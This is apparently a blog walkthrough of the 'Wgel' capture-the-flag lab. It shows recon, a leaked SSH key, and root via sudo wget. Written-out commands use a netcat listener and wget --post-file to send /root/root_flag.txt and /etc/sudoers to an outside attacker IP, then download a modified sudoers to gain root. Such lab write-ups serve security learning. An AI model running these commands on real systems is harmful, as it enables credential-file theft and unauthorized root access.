This page looks best with JavaScript enabled

Wgel CTF

 ·  ☕ 1 min read  ·  ✍️ M4t35Z

Can you exfiltrate the root flag?

Enumeration

Nmap

nmaps

  • We have port 22 and 80 open
    Port 80 source:
<!-- Jessie don't forget to udate the webiste -->
  • We got the username jessie

Dirsearch

  • We found /sitemap
    website

  • Run dirsearch again but now in /sitemap
    ds_sitemap

  • Go to /sitemap/.ssh and download the id_rsa file

Connecting to ssh

chmod 600 id_rsa
ssh -i id_rsa jessie@10.10.109.62

usertxt

Privilege escalation

sudo -l tell us everything we need.
sudo_-l

Exploiting the vuln

Attacker:

nc -lvp 1337 > root.txt

Victim:

sudo wget --post-file=/root/root_flag.txt 10.8.22.204:1337

And just hold enter some time then just crtl+c and cat root.txt

  • We got it
    rootflag

Getting a root shell

  • Get the /etc/sudoers file from the victim
sudo wget --post-file=/etc/sudoers 10.8.22.204:1337

sudoers

  • Edit it so jessie could just sudo su
    Just replace NOPASSWD: /usr/bin/wget with NOPASSWD: ALL and u r done
    sudoersedit
    sudoers_edited

  • Download on victim, while replacing the original file

cd /etc
sudo wget 10.8.22.204:8000/files/sudoers --output-document=sudoers

Now we have the edited file

sudo su

We got the root shell!!
rootshell

Share on
Support the author with

M4t35Z
WRITTEN BY
M4t35Z